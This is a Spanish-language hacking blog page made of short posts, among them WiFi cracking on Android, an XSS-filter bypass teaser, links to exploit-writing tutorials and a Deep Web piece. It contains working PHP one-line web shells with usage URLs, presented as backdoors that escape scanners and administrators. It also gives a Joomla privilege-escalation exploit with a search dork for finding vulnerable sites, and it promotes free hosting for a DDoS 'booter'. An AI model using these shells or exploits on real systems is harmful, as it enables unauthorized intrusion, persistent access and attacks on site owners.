Crackear redes Wifi con tu android(En modo Monitor)

Seguramente a muchos les paso por la cabeza la idea de crackear redes wifi con su smartphone, pero para nuestra mala suerte no se podía  por que sorprendentemente el modo monitor(modo para snifear el trafico Wifi) no se puede encontrar en cualquier dispositivo android(por no decir todos), ya que el chipset que se utiliza en los dispositivo android que mayormente son realizadas por Broadcom no añadieron el soporte para el modo monitor.

Pero un grupo de investigadores decidieron pasar sus vacaciones viendo la forma de añadir el modo monitor a sus android(Nexus One y Galaxy S II), en un primer momento compilaron el controlador en modo depuración, y se dieron cuenta que el modulo elimina los encabezados 801.11 en Hw, con la cual concluyeron que se necesita hacer un cambio de firmware en sus dispositivos android, así que empezaron hacerle ingeniería inversa al firmware y después de unas semanas obtuvieron una compresión decente de la recepción de paquetes en el proceso, con lo cual sacaron su 1er firmware con el modo monitor añadido.

ByPass Anti-XSS de Chrome V. 18 | 19 | 20

Se habrán percatado que cuando intentamos aprovechar un XSS no persistente, en el navegador Chrome no funciona, puesto que el filtro Anti-Xss que tiene nos impide inyectar dicho código.

Comparemos, en FireFox no tiene un filtro anti-xss

Y Chrome si:

Creación de Exploits por corelanc0d3r traducidos por Ivinson

Hace poco nuestro amigo Ivinson de cracklatinos se puso a traducir los tutoriales de "Creación de Exploit" de corelanc0d3r, lo cual le estoy agradecido por su trabajo y el ya lo sabe xD.

Aquí les dejo la lista de tutoriales traducidos al español así que disfrutenlo.

Creación de Exploits 1: Desbordamiento de Stack por corelanc0d3r traducido por Ivinson

Creación de Exploits 2: Desbordamiento de Stack  por corelanc0d3r traducido por Ivinson

Creación de Exploits  3: SEH  por corelanc0d3r traducido por Ivinson

Creación de Exploits 3b: SEH  por corelanc0d3r traducido por Ivinson

Creacion de Exploits 4: De Exploit a Metasploit por corelanc0d3r traducido por Ivinson

Creación de Exploits 5:  Acelerar el Proceso con Plugins y módulos por corelanc0d3r traducido por Ivinson

Backdorea con las Shell Web mas pequeñas!

De seguro ya habrán visto algunos funciones PHP que te ejecutan comandos como si estuvieran en una shell y con las cuales podemos hacer un backdoor y mantener el acceso en un servidor.
Además les quiero mostrar algunos códigos ingeniosos para llegar a ello y asi pasar desapercibido ante un scanner o hasta el mismísimo administrador Web.

Para comenzar les voy a listar los mas conocidos y detectados a simple vista:

system.php

<?@system($_GET[_]);?>

uso: ww2.pwnakil.com/PoC/shell/system.php?_=ls -a

shell_exec.php

<?=@shell_exec($_GET[_])?>

uso: ww2.pwnakil.com/PoC/shell/shell_exec.php?_=ls -a

exec.php

<?=@exec($_GET[_])?>

uso: ww2.pwnakil.com/PoC/shell/exec.php?_=ls -a

Hosting Free para tu Booter

Paseando por internet, me tope con esta Web la cual ofrece un servicio de hosting gratis con Cpanel, lo unico que tienes que tener es un dominio, puede ser de pago o free como estos uni.me.

Aqui esta la direccion hyperhosts.com.

Hacked Joomla! v. [1.6.x][1.7.x][2.5.0-2.5.2] - Escalación de Privilegios

Esta vulnerabilidad de joomla nos permite escalar privilegios durante el registro de un usuario nuevo, para la versiones 1.6.x/1.7.x  no se han emitido ningun parche hasta el momento y las versiones 1.0.x/1.5.x/2.5.3+ no son vulnerables. pero para nuestro consuelo la v. 1.5.x (que no este parcheada) de joomla tiene el  bug archiconocido del Token , que puedes cambiar el pass del admin, bueno eso es otro tema.

Centremonos en lo nuestro y Explotamos esta vulnerabilidad xD! que muchas web que usan joomla las tienen.

 El bug consiste en crearnos un usuario nuevo, pero antes de eso debemos agregar un parámetro mas al formulario del registro, pueden usar firebug( Addon for Firefox), bueno busquemos un potencial y latente web joomla :D .

Dork:: inurl:/index.php?option=com_users&view=registration
Exploit Code For use with Firebug:: <input value="7" name="jform[groups][]" />

Deep Web - El mundo paralelo a Internet

Hace unas semanas me entere de este cybermundo oscuro , internet fantasma , invisible web o como lo quieran llamar gracias a un amigo que lo posteo en un foro , este cybermundo ya existia de hace mucho tiempo, segun he leido desde 1994, bueno dejando la historia, mi amigo me comentaba las cosas que habia ahi  y que no se podia encontrar facilmente en el internet que todos conocemos, como Mercados negros donde se vende todo tipo de cosas, drogas, Botnets,Organos humanos, Pornografia Infantil, Documentos Secretos, Sicarios , venta de Base de Datos de las web de algunos gobiernos,armas, etc; entonces con mucha curiosidad decidi entrar, pero para ello necesitas navegar por la redes de TOR.

para los que no saben a que me refiero, TOR (The Onion Router) es un proyecto de desarrollo de redes comunicacion que preserva nuestra identidad, en pocas palabras por las redes de TOR navegamos anonimamente.

entonces tienes que descargar el software que te encamina por la redes de TOR de aqui https://www.torproject.org/download/download